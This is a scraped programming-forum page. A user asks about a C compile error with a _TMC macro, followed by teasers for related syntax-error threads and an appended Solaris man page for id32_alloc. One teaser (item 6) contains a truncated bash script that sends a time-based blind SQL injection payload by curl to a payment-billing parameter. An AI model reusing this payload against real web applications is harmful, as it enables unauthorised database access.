Sponsored Content
Top Forums Programming Newbie Question.. -> error: syntax error before ';' token Post 302338606 by reelflytime on Tuesday 28th of July 2009 11:09:47 AM
Old 07-28-2009
I am receiving the error

HGetInput.c: In function `H_YesNo':
HGetInput.c:43: error: syntax error before ';' token
HGetInput.c:43: error: syntax error before ')' token

at line "tmprintf(&tmBundle, _TMC("{0}"),Prompt);"

Other function call are using _TMC with no issues... and I have played with this quite a bit but no luck.

thank you in advance..

-j

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. UNIX for Advanced & Expert Users

Syntax error near unexpected token

Hi, When I run the below shell script I'm getting the error " syntax error near unexpected token `" Script: REM :: File Name : Refresh_OTL.bat REM :: Parameters : %1 - Region REM :: : %2 - Cube Type REM :: : REM :: Notes : REM ============================== set ENVIRONMENT... (2 Replies)
Discussion started by: tomailraj
2 Replies

3. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

4. Shell Programming and Scripting

Syntax error near unexpected token `done'

Hi all, Here is a simple script that is working in one server and is giving a syntax error in other server. Can somebody help me ? #!/bin/bash # ftp files done < $file errors: I tried..with no success: if ; then (21 Replies)
Discussion started by: Lenora2009
21 Replies

5. UNIX for Dummies Questions & Answers

> 5 ")syntax error: operand expected (error token is " error

im kinda new to shell scripting so i need some help i try to run this script and get the error code > 5 ")syntax error: operand expected (error token is " the code for the script is #!/bin/sh # # script to see if the given value is correct # # Define errors ER_AF=86 # Var is... (4 Replies)
Discussion started by: metal005
4 Replies

6. Shell Programming and Scripting

What do I do here? #!/bin/bash payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)# hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'` curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill... (2 Replies)
Discussion started by: iiiiiiiiiii
2 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

8. Shell Programming and Scripting

Syntax error near unexpected token `|'

Hi All; I try to write a bash code and I am using command substitution. My code is like: #!/bin/bash IP="10.0.0.1 10.0.0.2" PORT="22 80" USERNAME="admin" SCRIPT_HOST="adminHost" HOME_DIR=/home/admin SCRIPT_DIR=$HOME_DIR/scripts script="sudo /my_remote_script.sh" SSH="/usr/bin/ssh... (7 Replies)
Discussion started by: Meacham12
7 Replies

9. How to Post in the The UNIX and Linux Forums

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

10. UNIX for Beginners Questions & Answers

Getting this error syntax error near unexpected token `)'

Hi Everyone, my script was running Ok, but suddenly it started giving this error. ./update_env_bi.sh: line 54: syntax error near unexpected token `)' ./update_env_bi.sh: line 54: `sed -i "s/PORT=*1/PORT=$2/" repository.xml' The line 54 has this code. sed -i "s/PORT=*1/PORT=$2/"... (2 Replies)
Discussion started by: shajay12
2 Replies
id32_alloc(9F)						   Kernel Functions for Drivers 					    id32_alloc(9F)

NAME
id32_alloc, id32_free, id32_lookup - 32-bit driver ID management routines SYNOPSIS
#include <sys/ddi.h> #include <sys/id32.h> uint32_t id32_alloc(void *ptr, int flag); void id32_free(uint32_t token); void *id32_lookup(uint32_t token); INTERFACE LEVEL
Solaris architecture specific (Solaris DDI). PARAMETERS
ptr any valid 32- or 64-bit pointer flag determines whether caller can sleep for memory (see kmem_alloc(9F) for a description) DESCRIPTION
These routines were originally developed so that device drivers could manage 64-bit pointers on devices that save space only for 32-bit pointers. Many device drivers need to pass a 32-bit value to the hardware when attempting I/O. Later, when that I/O completes, the only way the driver has to identify the request that generated that I/O is via a "token". When the I/O is initiated, the driver passes this token to the hardware. When the I/O completes the hardware passes back this 32-bit token. Before Solaris supported 64-bit pointers, device drivers just passed a raw 32-bit pointer to the hardware. When pointers grew to be 64 bits this was no longer possible. The id32_*() routines were created to help drivers translate between 64-bit pointers and a 32-bit token. Given a 32- or 64-bit pointer, the routine id32_alloc() allocates a 32-bit token, returning 0 if KM_NOSLEEP was specified and memory could not be allocated. The allocated token is passed back to id32_lookup() to obtain the original 32- or 64-bit pointer. The routine id32_free() is used to free an allocated token. Once id32_free() is called, the supplied token is no longer valid. Note that these routines have some degree of error checking. This is done so that an invalid token passed to id32_lookup() will not be accepted as valid. When id32_lookup() detects an invalid token it returns NULL. Calling routines should check for this return value so that they do not try to dereference a NULL pointer. CONTEXT
These functions can be called from user or interrupt context. The routine id32_alloc() should not be called from interrupt context when the KM_SLEEP flag is passed in. All other routines can be called from interrupt or kernel context. SEE ALSO
kmem_alloc(9F) Writing Device Drivers SunOS 5.10 12 Dec 2001 id32_alloc(9F)